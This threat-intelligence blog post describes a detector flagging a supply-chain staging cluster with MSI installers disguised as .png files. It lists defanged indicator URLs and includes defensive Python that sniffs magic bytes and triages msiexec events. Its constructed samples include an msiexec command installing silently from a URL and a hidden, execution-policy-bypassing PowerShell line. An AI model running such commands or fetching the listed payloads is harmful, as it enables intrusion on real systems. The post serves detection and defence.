
Our Sandtrout Detector Flagged a Pipeline-Exfil and MSI-Stager Cluster With Hours to Spare. Three Indicators Nobody Else Has Published Yet.

  • Writer: Patrick Duggan

This morning one of our precursor detectors, the one we call Sandtrout, climbed from a score of 0.4 to 0.6 and crossed its elevation threshold, with a stated lead time of zero to six hours before the campaign it stages typically fires. That detector is named for the larval form of Frank Herbert's sandworm, because the entire premise is that the worm is easier to catch before it grows. Sandtrout watches for the larval phase of supply-chain worms — credential encapsulation, maintainer-account compromise, build-pipeline tampering — before the mass-publish bloom that everyone else covers after the fact. It caught the TeamPCP Mini-Shai-Hulud campaign hours before the @antv mass-publish bloom on May 27. This morning it caught something else, and the useful part is that the specific artifacts do not appear in anyone's public reporting yet.



What It Saw


Three markers, which together describe a chain rather than a single tool. The first is a build-pipeline artifact, a diff named for its job: pipeline exfiltration, the stage where an attacker who has gotten into a continuous-integration pipeline siphons off the secrets and source that live there. The other two are payload-staging URLs, and they share a tell that should make any defender's neck prickle: files ending in .png that are not images at all. They are Windows Installer (MSI) packages wearing a picture's file extension. One sits on a throwaway top-level-domain host, hxxps://canigrup[.]top/optimized_MSI.png. The other is parked on what looks like a compromised legitimate business website, hxxps://brenmayasociados[.]com/sass/optimized_MSIyu.png. Both URLs, plus their parent domains, are now live in our IOC feed under the source tag sandtrout-precursor, and as of this morning neither was present in our corpus or, as far as we can find, in public threat reporting.



Why The Disguise Matters


The MSI-stager-via-image trick is having a moment. The SANS Internet Storm Center published a diary on June 5 titled, with appropriate exasperation, "The Evil MSI Background is Back," documenting payloads embedded into image files as a technique that is getting more popular, not less. The reason it works is the same reason living-off-the-land tradecraft always works: msiexec.exe is a Microsoft-signed Windows binary that is trusted by default, so a malicious MSI handed to it runs under a trusted process and slips past controls that only watch for unsigned or unknown executables. Renaming the payload to .png buys the attacker one more layer of camouflage at the download stage, because a great many web filters, mail gateways, and casual human eyeballs treat a .png as harmless by definition. It is not harmless. It is an installer with a costume on. The costume only fools checks that trust the suffix or the server's Content-Type header: an MSI is an OLE compound file, and its first eight bytes (D0 CF 11 E0 A1 B1 1A E1) say so whatever the file is called.


What makes this particular catch worth writing down is not the technique, which is documented, but the assembly. A pipeline-exfiltration diff and two disguised-MSI payloads on two different kinds of host — one disposable, one hijacked — is the shape of a full operation staging itself: get into the build pipeline, steal what is there, and pre-position the endpoint payloads on infrastructure that will not get taken down before the campaign fires. We are looking at the larval stage of that, before the bloom, which is the only stage at which a defender has any time at all.



The Whole Point Is The Clock


We have written before that our structural advantage is not budget; it is where we choose to look. By the time a disguised-MSI campaign shows up in an incident-response writeup, the MSI has already run on somebody's machine. The value of watching the staging end — the moment a pipeline-exfil diff and a costumed installer appear on attacker infrastructure — is that you are reading the campaign's intentions hours before it acts on them, not weeks after. Six hours is not a lot of time. It is also the difference between a hunt and an autopsy. Sandtrout exists to convert the second into the first, and this morning it did.



What A Defender Should Do With This


Block and hunt the network indicators: the two payload URLs and their parent domains, canigrup[.]top and brenmayasociados[.]com, are in our free STIX feed now and you can pull them this morning. Beyond the specific indicators, hunt the behaviors, because the next campaign will use different hosts. Look for files delivered with an image extension whose actual content is an MSI; the magic bytes do not lie even when the extension does, so inspect file headers (an MSI starts with the OLE compound-file signature, a PNG with 89 50 4E 47) rather than trusting the suffix or the Content-Type header. Watch for msiexec launched with a URL as its package source, which it will happily install from directly, for msiexec running from anywhere other than System32 or SysWOW64, and for MSI installs that spawn script interpreters or reach out to the network. Legitimate installers also run custom actions through cmd.exe and powershell.exe, so baseline what your fleet's sanctioned packages do before alerting on the child processes alone. On the supply-chain side, treat your CI/CD pipeline as a credential vault that an attacker wants to drain quietly: alarm on anomalous pipeline runs, unexpected secret access, and workflow changes pushed by accounts that do not normally touch them. And if you run a legitimate website and you are reading this, understand that the brenmayasociados[.]com pattern means your site can be conscripted as someone else's payload host without your knowledge: check your own public directories for files you did not put there.
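The two hunts above, the header check behind "the magic bytes do not lie" and the msiexec behavior watch, as an added example that is not code from the original post or from Sandtrout. The magic values (OLE compound file for MSI, PNG, ZIP, PE) are real; everything else is an assumption for illustration: the Sysmon-style field names Image, ParentImage and CommandLine, the staging.example.invalid host, and every sample byte string and event, all of which are constructed rather than captured.

```python
"""
Added example (not the original post's code): (1) identify a file's real
container format from its magic bytes, so an MSI named *.png is caught
regardless of suffix, and (2) triage Sysmon-style process-creation events for
msiexec invoked from a URL, from a non-standard path, or spawning a script
host. All sample bytes, paths and events below are constructed.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Every MSI is an OLE2 Compound File (CFB); this signature is the real tell.
CFB_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")   # also legacy .doc/.xls
PNG_MAGIC = bytes.fromhex("89504E470D0A1A0A")
ZIP_MAGIC = b"PK\x03\x04"                        # also OOXML, JAR, APK
PE_MAGIC = b"MZ"

IMAGE_EXTS = {".png", ".jpg", ".jpeg", ".gif", ".bmp", ".webp", ".ico"}
EXECUTABLE_CONTAINERS = {"cfb", "zip", "pe"}


def sniff(data: bytes) -> str:
    """Name the container format by leading bytes, ignoring the file name entirely."""
    if data.startswith(CFB_MAGIC):
        return "cfb"
    if data.startswith(PNG_MAGIC):
        return "png"
    if data.startswith(ZIP_MAGIC):
        return "zip"
    if data.startswith(PE_MAGIC):
        return "pe"
    return "unknown"


def file_extension(path_or_url: str) -> str:
    """Lower-cased extension of the last path segment ('' if none); query strings ignored."""
    name = urlparse(path_or_url).path.replace("\\", "/").rsplit("/", 1)[-1]
    return ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""


def extension_mismatch(name: str, data: bytes) -> Optional[str]:
    """Real format when an image-named file holds an executable container, else None."""
    actual = sniff(data)
    if file_extension(name) in IMAGE_EXTS and actual in EXECUTABLE_CONTAINERS:
        return actual
    return None


# --- msiexec behaviour hunt over process-creation events (assumed field names) ---
MSIEXEC_PATHS = {r"c:\windows\system32\msiexec.exe", r"c:\windows\syswow64\msiexec.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Package argument of msiexec: /i, /package or /a followed by a quoted or bare target.
PKG_RE = re.compile(r"[/-](?:i|package|a)\s+\"?([^\"\s]+)", re.IGNORECASE)
URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def basename(image: str) -> str:
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_process_event(event: Dict[str, str]) -> List[str]:
    """Reasons a process-creation event is suspicious; an empty list means nothing fired."""
    reasons: List[str] = []
    image = event.get("Image", "")
    parent = event.get("ParentImage", "")
    cmd = event.get("CommandLine", "")
    if basename(image) == "msiexec.exe":
        if image.lower() not in MSIEXEC_PATHS:
            reasons.append("msiexec running from a non-standard path")
        pkg = PKG_RE.search(cmd)
        if pkg:
            target = pkg.group(1)
            if URL_RE.match(target):
                reasons.append("msiexec installing straight from a URL")
            if file_extension(target) in IMAGE_EXTS:
                reasons.append("package path or URL wears an image extension")
    if basename(parent) == "msiexec.exe" and basename(image) in SCRIPT_HOSTS:
        reasons.append("msiexec spawned script host " + basename(image))
    return reasons


def hunt(events: List[Dict[str, str]]) -> List[int]:
    """Indexes of events that produced at least one reason."""
    return [i for i, ev in enumerate(events) if triage_process_event(ev)]


# Constructed samples: not real files, not real telemetry.
DISGUISED_MSI = CFB_MAGIC + bytes(24)            # a bare CFB header is enough for the check
REAL_PNG = PNG_MAGIC + b"\x00\x00\x00\x0dIHDR"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'msiexec.exe /i "C:\Users\alice\Downloads\vendor-tool-1.2.msi"'},  # benign
    {"Image": r"C:\Windows\System32\msiexec.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "msiexec /qn /i https://staging.example.invalid/optimized_MSI.png"},  # URL + .png
    {"Image": r"C:\Users\Public\msiexec.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"msiexec /qn /i C:\Users\Public\wallpaper.png"},                    # copied binary
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "powershell -nop -w hidden -ep bypass"},                               # custom action
]

if __name__ == "__main__":
    print("optimized_MSI.png really is:", extension_mismatch("optimized_MSI.png", DISGUISED_MSI))
    for i in hunt(SAMPLE_EVENTS):
        print(i, triage_process_event(SAMPLE_EVENTS[i]))
```

Run the header check at the proxy or mail gateway on the response body, not on the URL, and pair the process hunt with a baseline of your own sanctioned installers: the fourth sample (msiexec spawning powershell.exe) is exactly what a legitimate custom action looks like, so that rule earns its keep as an enrichment on the other signals rather than as a stand-alone alert.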


We caught this one as a larva. The honest caveat, as always, is that we catch the ones that stage where we are watching and miss the ones that do not, so this is a floodlight, not a force field. But a floodlight pointed at the staging ground, six hours before the bloom, is exactly the instrument most defenders do not have — and on a quiet Wednesday morning it lit up three indicators that, for now, are ours and nobody else's.





